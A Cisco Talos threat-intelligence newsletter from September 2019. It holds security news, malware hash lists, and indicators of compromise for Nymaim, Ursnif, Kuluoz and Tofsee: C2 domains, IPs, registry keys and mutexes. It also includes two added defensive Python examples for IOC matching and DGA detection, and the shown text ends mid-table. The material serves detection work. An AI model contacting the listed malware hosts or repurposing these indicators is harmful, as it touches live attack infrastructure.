
Threat Source newsletter (Sept. 5, 2019)


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

By now, nearly everyone has heard of BlueKeep. It definitely sounds scary, with all this talk of wormable bugs and WannaCry. But so far, no attackers have used it to launch a large-scale attack.

Of course, we knew this wouldn’t stay quiet forever. Last month, Microsoft disclosed more RDP vulnerabilities in what’s being called “DejaBlue.” Like BlueKeep, these are wormable, pre-authentication bugs in Remote Desktop Services, and we have a walkthrough for how Cisco Firepower customers can stay protected.

Elsewhere on the vulnerability front, we have advisories out for an information disclosure in Blynk-Library and two bugs in Epignosis eFront.

We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “DNS on Fire” at Virus Bulletin 2019
Location: Novotel London West hotel, London, U.K.
Date: Oct. 2 - 4
Speaker: Warren Mercer and Paul Rascagneres
Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered that targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research into DNSpionage, we also discovered an effort to redirect the targets’ DNS records, along with SSL certificates that had been registered for the hijacked names. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

  • A new study from IBM shows that American taxpayers do not support their tax money going toward paying ransomware extortion requests. The survey found that 80 percent of respondents say they are concerned about a ransomware attack on their city, and 60 percent say they would not want their government using taxpayer dollars to pay off attackers with the promise of returning stolen data.
  • A server containing millions of phone numbers linked to Facebook accounts was found exposed online, including 133 million U.S. users. The server was not protected by a password, so anyone who found it could access it. 
  • The Federal Trade Commission and the state of New York levied a $170 million fine against YouTube for its mishandling of children’s data. YouTube will now require users uploading content targeted toward children to tag them as such, and will ask for parental consent before tracking children’s usage. 
  • A new report suggests there could be a link between companies and cities that have cyber insurance policies and those who are targeted by ransomware attacks. Organizations with insurance are also more likely to pay any requested extortion payments compared to those without policies. 
  • Chinese tech company Huawei accused the U.S. of launching cyber attacks against it to steal information. They also said the American government has used “unscrupulous means” to disrupt its business. 
  • A recently discovered group of malicious websites targeting mobile devices are believed to be sponsored by China to target Uyghur Muslims. The websites were able to infect iPhones and Android devices just by having the user open the site. 
  • An attack took down a popular online forum used by protestors in Hong Kong. Citizens there have spent weeks pushing back on policies that would closer align the region’s government with China. 
  • Congress introduced a bipartisan bill that would boost the federal government’s cyber defense systems. The proposed law would increase the amount of funding the Department of Homeland Security has to beef up federal government agencies’ internal security. 
  • Google Pixel owners began receiving Android 10 this week. The new mobile operating system includes new security and privacy features, including the ability to change location tracking services on an app-by-app basis on one screen. 

Notable recent security issues

Title: New protection fends off password-stealing attacks from popular VPN service
Description: Last week, attackers began launching password-stealing attacks against FortiGate and Pulse Secure SSL VPN appliances. At the time, Cisco Talos released SNORT® rules to protect Pulse VPN, and there is now additional protection for FortiGate. Attackers are attempting to steal session data, passwords and encryption keys from servers running these two VPN products. Both bugs are path-traversal flaws in the appliances’ web interfaces: an unauthenticated attacker sends a crafted HTTP request whose path contains a traversal sequence, and the unpatched server returns files it should never expose.
Snort SIDs: 51370 – 51372, 51387 (Written by John Levy) 

Title: Multiple vulnerabilities disclosed in Cisco NX-OS software 
Description: Cisco disclosed three denial-of-service vulnerabilities in its NX-OS software: CVE-2019-1965, CVE-2019-1964 and CVE-2019-1962. These bugs can cause a variety of conditions, including forced reboots, crashes or disruption of certain processes. All three are considered high-severity vulnerabilities.
Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-memleak-dos 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-ipv6-dos 
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190828-nxos-fsip-dos
Snort SIDs: 51365 - 51367 (Written by John Levy)

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256:9a082883ad89498af3ad8ece88d982736edbd46d65908617cf292cf7b5836dbc 
MD5: 7a6f7f930217521e47c7b8d91fb79649
Typical Filename: DHL Scan File.img
Claimed Product: IMGBURN V2.5.8.0 - THE ULTIMATE IMAGE BURNER!
Detection Name: W32.9A082883AD-100.SBX.TG

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: 1755c179f08a648a618043a5af2314d6a679d6bdf77d4d9fca5117ebd9f3ea7c 
MD5: c785a8b0be77a216a5223c41d8dd937f
Typical Filename: cslast.gif
Claimed Product: N/A
Detection Name: W32.1755C179F0-100.SBX.TG

SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
Typical Filename: sayext.gif
Claimed Product: N/A
Detection Name: W32.093CC39350-100.SBX.TG 

Threat Roundup for August 30 to September 6

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Aug. 30 and Sept. 6. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
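The IOC lists below use three notations that a hunting script has to understand before it can compare them with host or network telemetry: defanged network indicators (`gokxyba[.]net`), environment-variable path prefixes (`%TEMP%\...`), and the `<random, matching 'regex'>` placeholder for names the malware randomises. The following is an added example, not Talos code: it turns a handful of IOC strings copied from this roundup into matchers and runs them over a constructed set of telemetry events (the events, the user name `bob` and the service name `AB12CD34` are made up for the demonstration).

```python
"""Turn Talos-style IOC strings into matchers and run them over telemetry.

Added example; not Talos code.  The IOC strings are copied from this
roundup; the telemetry events below are constructed for the demonstration.
"""
import re

# (IOC type, IOC string exactly as printed in the roundup)
IOCS = [
    ("domain",   "gokxyba[.]net"),                                    # Nymaim DGA output
    ("domain",   "update[.]jebac[.]net"),                             # Dorkbot
    ("ip",       "212[.]83[.]168[.]196"),                             # Dorkbot
    ("file",     r"%TEMP%\<random, matching '[a-z]{8}'>.exe"),       # Tofsee
    ("file",     r"%APPDATA%\Znawav.exe"),                            # Dorkbot
    ("registry", r"<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>"),  # Tofsee
    ("registry", r"<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS"),            # Tofsee
    ("mutex",    r"Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c"),                    # GandCrab
]

# Which telemetry event kind each IOC type is compared against.
EVENT_KIND = {"domain": "dns", "ip": "connect", "file": "file",
              "registry": "registry", "mutex": "mutex"}

HIVES = {
    "<HKLM>": r"(?:HKLM|HKEY_LOCAL_MACHINE)",
    "<HKCU>": r"(?:HKCU|HKEY_CURRENT_USER)",
    "<HKU>":  r"(?:HKU|HKEY_USERS)",
}
PLACEHOLDER = re.compile(r"<random, matching '?(.+?)'?>")   # body is already a regex
TOKEN = re.compile(r"(<HK[A-Z]+>|%[A-Za-z0-9]+%)")          # hive tokens and %ENV% prefixes

def refang(value):
    return value.replace("[.]", ".")

def literal_to_regex(text):
    """Escape a literal path/key fragment, expanding hive and %ENV% tokens."""
    out = []
    for tok in TOKEN.split(text):
        if tok in HIVES:
            out.append(HIVES[tok])
        elif len(tok) > 2 and tok.startswith("%") and tok.endswith("%"):
            out.append(r".+?")   # e.g. %APPDATA% -> C:\Users\bob\AppData\Roaming on a real host
        else:
            out.append(re.escape(tok))
    return "".join(out)

def compile_ioc(kind, value):
    if kind == "domain":
        # the name itself or any subdomain of it, never a longer name that merely contains it
        return re.compile(r"(?:^|\.)" + re.escape(refang(value)) + r"$", re.I)
    if kind == "ip":
        return re.compile("^" + re.escape(refang(value)) + "$")
    pieces, pos = [], 0
    for m in PLACEHOLDER.finditer(value):
        pieces.append(literal_to_regex(value[pos:m.start()]))
        pieces.append("(?:" + m.group(1) + ")")
        pos = m.end()
    pieces.append(literal_to_regex(value[pos:]))
    return re.compile("^" + "".join(pieces) + "$", re.I)   # Windows paths/keys are case-insensitive

COMPILED = [(EVENT_KIND[kind], value, compile_ioc(kind, value)) for kind, value in IOCS]

def match_events(events, compiled=COMPILED):
    """events: iterable of (kind, value). Returns [(kind, value, ioc_string), ...]."""
    hits = []
    for kind, value in events:
        for ev_kind, ioc, rx in compiled:
            if kind == ev_kind and rx.search(value):
                hits.append((kind, value, ioc))
    return hits

# Constructed telemetry, as (event kind, value); not taken from any real host.
SAMPLE_EVENTS = [
    ("dns",      "gokxyba.net"),
    ("dns",      "c2.update.jebac.net"),
    ("dns",      "www.google.co.uk"),
    ("dns",      "gokxyba.net.example"),                        # contains an IOC, must not match
    ("connect",  "212.83.168.196"),
    ("connect",  "212.83.168.19"),                              # prefix of an IOC, must not match
    ("file",     r"C:\Users\bob\AppData\Local\Temp\tsielhmq.exe"),
    ("file",     r"C:\Users\bob\AppData\Local\Temp\setup.exe"),
    ("file",     r"C:\Users\bob\AppData\Roaming\Znawav.exe"),
    ("registry", r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\AB12CD34"),
    ("registry", r"HKLM\SYSTEM\ControlSet001\Services\Tcpip"),
    ("registry", r"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"),
    ("mutex",    r"Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c"),
    ("mutex",    r"Global\pc_group=WORKGROUP&ransom_id=0123456789abcdef"),
]

if __name__ == "__main__":
    for kind, value, ioc in match_events(SAMPLE_EVENTS):
        print(f"{kind:8} {value!r:62} <- {ioc}")
```

Two caveats the roundup itself hints at. A placeholder such as `[A-Z0-9]{8}` under a Services key matches any eight-character service name, so on its own it is a weak indicator and should be read together with the other rows from the same threat (for Tofsee, the Windows Defender exclusion entries under `SysWOW64`). And the GandCrab mutex embeds a per-victim `ransom_id`, so an exact string match only finds that one infection; hunting for the `pc_group=...&ransom_id=` prefix instead generalises across victims.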
The most prevalent threats highlighted in this roundup are:
Threat Name | Type | Description
Win.Malware.Nymaim-7149347-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain generation algorithm (DGA) to produce candidate command and control (C2) domains from which it retrieves additional payloads.
Win.Malware.Ursnif-7149254-1 | Malware | Ursnif steals sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
Win.Malware.Kuluoz-7149209-1 | Malware | Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that also downloads and executes follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails posing as shipment delivery notifications or flight booking confirmations.
Win.Dropper.Tofsee-7147648-0 | Dropper | Tofsee is multi-purpose malware with modules for sending spam, conducting click fraud, mining cryptocurrency and more. Infected systems join the Tofsee spam botnet and send large volumes of spam to infect additional systems and grow the botnet under the operator’s control.
Win.Trojan.Dorkbot-7146944-0 | Trojan | Dorkbot is a worm that spreads through social networking sites and messaging apps. Once installed, the infected computer becomes part of a botnet, allowing the operator to control the machine remotely.
Win.Ransomware.Gandcrab-7145847-0 | Ransomware | GandCrab encrypts documents, photos, databases and other important files, typically appending the extension ".GDCB," ".CRAB" or ".KRAB." It is spread through traditional spam campaigns as well as multiple exploit kits, including Rig and GrandSoft.
Win.Malware.Phorpiex-7145044-1 | Malware | Phorpiex is a trojan and worm that infects machines to deliver follow-on malware. It has been observed dropping a wide range of payloads, including spam-sending malware, ransomware and cryptocurrency miners.
Win.Ransomware.Sage-7144073-1 | Ransomware | Sage ransomware encrypts files and demands payment for their recovery. Sage typically spreads via malicious email attachments, and the encrypted file extensions vary.
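Nymaim's DGA is what makes its domain list above so distinctive: the names are unpronounceable and most of them are never registered, so an infected host produces a burst of NXDOMAIN answers. The following is an added example, not Talos code, of how to hunt for that pattern in a DNS query log. It pairs the behavioral signal (many distinct NXDOMAINs from one client inside a short window) with a crude lexical score on the queried name so the analyst can tell a DGA burst from a misconfigured search domain. The log lines are constructed for the example; the domains in them are the Nymaim IOCs from this roundup plus a few ordinary names, and the client addresses and `corp.example` name are made up.

```python
"""Hunt for DGA-driven C2 lookups in DNS logs (added example, not Talos code)."""
import re
from collections import defaultdict
from datetime import datetime, timezone

# Constructed sample log, one query per line: "<RFC3339 time> <client> <qname> <rcode>"
SAMPLE_LOG = """\
2019-09-06T10:00:01Z 10.0.0.5 gokxyba.net NXDOMAIN
2019-09-06T10:00:02Z 10.0.0.5 bkigzfz.com NXDOMAIN
2019-09-06T10:00:02Z 10.0.0.5 upoeprpaa.net NXDOMAIN
2019-09-06T10:00:03Z 10.0.0.5 wjxvrsfryjq.pw NXDOMAIN
2019-09-06T10:00:03Z 10.0.0.5 gfjtjjgx.pw NXDOMAIN
2019-09-06T10:00:04Z 10.0.0.5 yzobvxei.net NOERROR
2019-09-06T10:00:05Z 10.0.0.7 www.google.co.uk NOERROR
2019-09-06T10:00:06Z 10.0.0.7 resolver1.opendns.com NOERROR
2019-09-06T10:00:07Z 10.0.0.7 intranet.corp.example NXDOMAIN
2019-09-06T10:30:00Z 10.0.0.5 gokxyba.net NXDOMAIN
"""

MULTI_PART_SUFFIXES = {"co.uk", "org.uk", "com.au", "co.jp", "com.br"}  # tiny stand-in for the PSL
RARE_LETTERS = set("jkqvwxz")   # rare in English words, common in DGA output

def registrable_label(qname):
    """The label just left of the public suffix: 'gokxyba' for gokxyba.net."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_PART_SUFFIXES:
        return labels[-3]
    return labels[-2] if len(labels) >= 2 else labels[0]

def lexical_score(label):
    """0..3; each point is one crude 'does not look like a word' signal."""
    letters = "".join(c for c in label.lower() if c.isalpha())
    if not letters:
        return 0
    vowel_ratio = sum(c in "aeiou" for c in letters) / len(letters)
    longest_run = max((len(m) for m in re.findall(r"[^aeiou]+", letters)), default=0)
    rare_ratio = sum(c in RARE_LETTERS for c in letters) / len(letters)
    return int(vowel_ratio < 0.25) + int(longest_run >= 5) + int(rare_ratio >= 0.25)

def find_dga_bursts(log_text, window_seconds=600, min_distinct=4):
    """Return {client: [finding, ...]} for every (client, time window) with at
    least min_distinct distinct NXDOMAIN names.  Each finding carries the names
    and their mean lexical score as supporting evidence."""
    buckets = defaultdict(set)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, rcode = line.split()
        if rcode != "NXDOMAIN":
            continue
        epoch = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc).timestamp()
        buckets[(client, int(epoch // window_seconds))].add(registrable_label(qname))
    findings = defaultdict(list)
    for (client, bucket), labels in sorted(buckets.items()):
        if len(labels) >= min_distinct:
            mean = sum(lexical_score(label) for label in labels) / len(labels)
            findings[client].append({
                "window_start": datetime.fromtimestamp(bucket * window_seconds, timezone.utc).isoformat(),
                "labels": sorted(labels),
                "mean_score": round(mean, 2),
            })
    return dict(findings)

if __name__ == "__main__":
    for client, hits in find_dga_bursts(SAMPLE_LOG).items():
        for hit in hits:
            print(client, hit["window_start"], hit["mean_score"], hit["labels"])
```

The lexical score is deliberately weak on its own: `upoeprpaa` scores 0 because it happens to be vowel-heavy, and short, real hostnames can score 1. That is why the burst count does the detecting and the score only ranks what was found; the published IOC list, which includes the registered names the heuristic misses, remains the authoritative check.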

Threat Breakdown

Win.Malware.Nymaim-7149347-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\GOCFK | 16
<HKCU>\SOFTWARE\MICROSOFT\KPQL | 16
<HKCU>\SOFTWARE\MICROSOFT\GOCFK, Value Name: mbijg | 16
<HKCU>\SOFTWARE\MICROSOFT\KPQL, Value Name: efp | 16
Mutexes | Occurrences
Local\{369514D7-C789-5986-2D19-AB81D1DD3BA1} | 16
Local\{D0BDC0D1-57A4-C2CF-6C93-0085B58FFA2A} | 16
Local\{D8E7AB94-6F65-71DE-8DA1-FE621BE2E606} | 16
Local\{F04311D2-A565-19AE-AB73-281BA7FE97B5} | 16
Local\{F6F578C7-92FE-B7B1-40CF-049F3710A368} | 16
Local\{0F53A50D-AEA8-402A-580B-3C32A490301E} | 16
Local\{42FDAA48-39A4-4464-9CC4-6F1A48111B12} | 16
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
gokxyba[.]net | 15
bkigzfz[.]com | 15
UPOEPRPAA[.]NET | 15
WJXVRSFRYJQ[.]PW | 15
gfjtjjgx[.]pw | 15
YZOBVXEI[.]NET | 15
DZLYHSMMLUL[.]PW | 15
EMKWQU[.]PW | 15
TQTZRZKIIID[.]COM | 15
MJWHLRF[.]NET | 15
tbblpqejav[.]pw | 13
fseqigbfr[.]in | 13
pscjvmzmy[.]in | 13
scvkmktqksu[.]pw | 13
ibypya[.]in | 13
hkfyto[.]pw | 13
qvrghscpr[.]in | 13
sbuhudow[.]pw | 13
yqofd[.]in | 13
luwjudefo[.]net | 13
uqzbwfz[.]net | 13
oangztra[.]com | 13
qanefmpvo[.]net | 13
chtugnzdw[.]com | 13
jcggrdthx[.]net | 13
*See JSON for more IOCs
Files and or directories created | Occurrences
%ProgramData%\ph | 16
%ProgramData%\ph\eqdw.dbc | 16
%ProgramData%\ph\fktiipx.ftf | 16
%TEMP%\gocf.ksv | 16
%TEMP%\kpqlnn.iuy | 16
%TEMP%\fro.dfx | 13
%TEMP%\npsosm.pan | 13
\Documents and Settings\All Users\pxs\dvf.evp | 13
\Documents and Settings\All Users\pxs\pil.ohu | 13

File Hashes

037d05e6a51414ff22c6f27f5758bab12a237fae5a8da61b3d9579e77cf68cc9 04f91d0532ceec2b0455ab9745dff5b423f34e8f32cee261db68ad28db024a08 123573d7840dccbc368911be620c2c839fcb81642abeaed5a67316c003bb67a4 2f485d4cf77a8079c75d584aed08d769b864ba76373250e583b7268a444fc2b4 6f7ef5eaa16f360e0ce570fe2196bc91ee133cb954a1d62ff9d4a72a1f0e2c45 78838c78442dd1afb4d1806e0eb81ddb4931a1f51dd021a24109a461105232c0 79158026c4d06723c530813c1e2a90024e88dddac9aa84cf0314f004eb49062c 792daabd16b1ceb49a85bccc8cdd8fcf8c21a9a0df3eb909e06df9cd81f786c7 7a06a8e0fc5ee2416369f3638bb42a7b4994fd2e74b89b6a533636de6f8a4a86 7c8ff85a4e95716c990a60b5f5a5992c0fe530e7a366f80bafbc6621ffff0fbb ac1887855401066432456e2890c97b7b303e08b7b65e20a8fd004052175a5b18 c19036fc9959e2003d48bb68b2cd6c95a6423b6fa7a434c7ce96d77d69c6e532 c1d686b25508f66fd32aaaeb1caccf0fd233f5303418a3658088205f543182a3 ca3a1e4d93207501cd2911bf88a92431ec5ef877b7b1a7200072c976339a07ae fc5b7ae3747c98d4658a0599130d5374c71bf2aa88483fab28d2e643e6283164 fcccfc04baab2622fbc4cf0ee2f47bd9eeb53e98a57a9754286805c0580ff79f

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: AMP, ThreatGrid, Umbrella (images not reproduced)

Win.Malware.Ursnif-7149254-1

Indicators of Compromise

Registry Keys | Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: api-PQEC | 10
<HKCU>\SOFTWARE\MICROSOFT\IAM, Value Name: Server ID | 10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 | 10
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER | 10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5, Value Name: Client | 10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5, Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} | 10
<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5, Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} | 10
<HKLM>\SYSTEM\CONTROLSET001\CONTROL\SESSION MANAGER, Value Name: PendingFileRenameOperations | 10
Mutexes | Occurrences
Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269} | 10
Local\{7FD07DA6-D223-0971-D423-264D4807BAD1} | 10
Local\{B1443895-5CF6-0B1E-EE75-506F02798413} | 10
{A7AAF118-DA27-71D5-1CCB-AE35102FC239} | 10
{C3863B40-467D-ED33-68A7-DA711CCBAE35} | 10
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
208[.]67[.]222[.]222 | 10
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
resolver1[.]opendns[.]com | 10
222[.]222[.]67[.]208[.]in-addr[.]arpa | 10
myip[.]opendns[.]com | 10
jiauwnehbtqiwjeqwe[.]net | 10
Files and or directories created | Occurrences
\{4BC230AC-2EB3-B560-90AF-42B9C45396FD} | 10
%APPDATA%\Microsoft\Dmlogpui | 10
%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe | 10
%TEMP%\<random, matching [A-F0-9]{4}>.bi1 | 9
%TEMP%\8A4.bi1 | 1

File Hashes

055f5a38fca8e55adb9e46bfc7dfe3b9094ad659bb473553881b0c72cc580120 2a88b621e291815db268dd8a9e95f2fbff5b2216358ed24eab198917fe65742b 3b306bbe5aaabdd008259ac755b50ac5c53144bd2f79b90d1f29c3c576172661 7cbc76561f75ead55fd3a776ba7b44d253783da767f4fb20b09616fa1039ac8b b2939cb18525d202ec9af8629b4ba0aaaab24e7b81bd5abd00fbb69d34a1dea5 c23a3dcbe61fb4877322c6f0e24476d9fd433ca013f62cc9f42a9cb62acf02f1 cd83db4c5a03f1fae1fa4183e70ea6a6acfc0657e45fbecabc48adfb281f39fe cf10ee7467a9ee13fe44e9ea9c2833dde4c5270909a75c5fd8b3ec3627a17af5 d257e0242bc63f343d6712fe05e5b8c9d9be84645e5a2063a1d12820aae450fa fb1eac4151a47e030a0d372c40fc3c70cd4ba76bc40571fa69d60f398196726a

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid (images not reproduced)

Win.Malware.Kuluoz-7149209-1

Indicators of Compromise

Mutexes | Occurrences
2GVWNQJz1 | 188
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
87[.]106[.]4[.]78 | 129
95[.]141[.]29[.]195 | 128
50[.]57[.]99[.]160 | 126
188[.]116[.]23[.]96 | 119
178[.]33[.]227[.]11 | 114
91[.]227[.]26[.]178 | 114
78[.]46[.]92[.]70 | 110
91[.]220[.]215[.]29 | 105
Files and or directories created | Occurrences
%LOCALAPPDATA%\etxaxetj.exe | 1
%LOCALAPPDATA%\eopjtjwg.exe | 1
%LOCALAPPDATA%\tfugpetb.exe | 1
%LOCALAPPDATA%\tjdsucos.exe | 1
%LOCALAPPDATA%\uxfuuarq.exe | 1
%LOCALAPPDATA%\lspsvmef.exe | 1
%LOCALAPPDATA%\addakgil.exe | 1
%LOCALAPPDATA%\gdsfuent.exe | 1
%LOCALAPPDATA%\kesjxiuw.exe | 1
%LOCALAPPDATA%\rvdhhicw.exe | 1
%LOCALAPPDATA%\odjotitr.exe | 1
%LOCALAPPDATA%\apferdrh.exe | 1
%LOCALAPPDATA%\mxdmpmxp.exe | 1
%LOCALAPPDATA%\jujldfjk.exe | 1
%LOCALAPPDATA%\lwmwmfsv.exe | 1
%LOCALAPPDATA%\sauuvxpt.exe | 1
%LOCALAPPDATA%\rvrsnrcv.exe | 1
%LOCALAPPDATA%\libwmqqa.exe | 1
%LOCALAPPDATA%\sfvadtvv.exe | 1
%LOCALAPPDATA%\cswmofrn.exe | 1
%LOCALAPPDATA%\hngjmrve.exe | 1
%LOCALAPPDATA%\jkqgumia.exe | 1
%LOCALAPPDATA%\cqeelolf.exe | 1
%LOCALAPPDATA%\ipatebes.exe | 1
%LOCALAPPDATA%\xmcejvax.exe | 1
*See JSON for more IOCs

File Hashes

01412a2d6877375f88d6b502600e45a26197396a1f0b019d8d10437729f52257 02205537e0ac5c8b8b66f53e8d2993b706a8f7fa5757346a7312db646a471143 0364c9b75b03b9ed56059c9bea7f8a8f81f13d2cfc061c0b6e13525dcc3bd7dd 0383d381bf8f010ebfe0215528a7289429052487a2fe90ce35eae0f7f11e1fea 05fa1a824e573e2db9dfbf4e3358a5f2c88956ae6a669f6336c42812a67a524f 06de3f442bfeee18831cebef86194b8166a188af312b739fb628c203e4d5f2ea 078e7fba23d21250e959935ba3ab9559dddad02240443543616eab37547ddd86 07b13ab67c36b30dc081deebdd0bc5a9319a3ddf05e17a5d4552c16ded433d4e 087d4788799c0e935673ef2572bebf8f86ca61e8966b2404e20432a417e73894 0909060506cdf2d77307b2ae36380fc7f85de0a9c1c103ca629d3089ba507df3 091b1cb41a31ffd75781295ec748bb6b82bc6624dd7853405304a08a322c51ec 0a482d15c908dd7b8936e0900fcabef622708b79cd2020c730376aec9c7ca388 0c04b5f60896203a5d39a707080f344d27aa39048f171e9284d6d8b665e226e5 0c86168150197d12329c57ad9c8d616a15f285483ba3cec4a9bb4ede46e4d234 0ce022144a2b3d712579d8a63c9c73109ac74eff4ad68f1b6fbd8f593c706aa6 0ce6ae758bdc6f4c44b249f4ecf327f5a00a238ebed3bbe8b06f317b91335f1c 0d3ce20b680e2dbf203a10e9c8ed97c4f7006be9b3a6fddbeb443937480d98b5 0de776cb80503f7daa3effefbb2739f9c927f028df4445fa051cb33377de359f 109a6498f4d7b51f0ede104d4bd8f78782913d641147930e07c6dc236dc04a94 126266edb2a41407ba26f72e127430dd5932b07ab2e312dfd09285bc9f5db40b 12e80c62f20986a8abe96df7be0c1b91d5fd32bef9781bf669d7a5d538af778c 13705e3f984dc79824e22fa9349c3704dbe5d67a606f59029622887379eeb302 14e13631f15fc311ef20c9e87ef28675dc14cd83ed871f44266811e103b45284 15381012927b9852633c0943aab2d0522dbf3d3d0a326e4b0e18e21ba29f6065 168c0dd6882307664579943b5786594e94435ccab43618aee5b04d6f974bda2c
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection: AMP, ThreatGrid (images not reproduced)

Win.Dropper.Tofsee-7147648-0

Indicators of Compromise

Registry Keys | Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES, Value Name: Config3 | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: Type | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: Start | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: ErrorControl | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: DisplayName | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: WOW64 | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: ObjectName | 13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>, Value Name: Description | 13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES, Value Name: Config0 | 13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES, Value Name: Config1 | 13
<HKU>\.DEFAULT\CONTROL PANEL\BUSES, Value Name: Config2 | 13
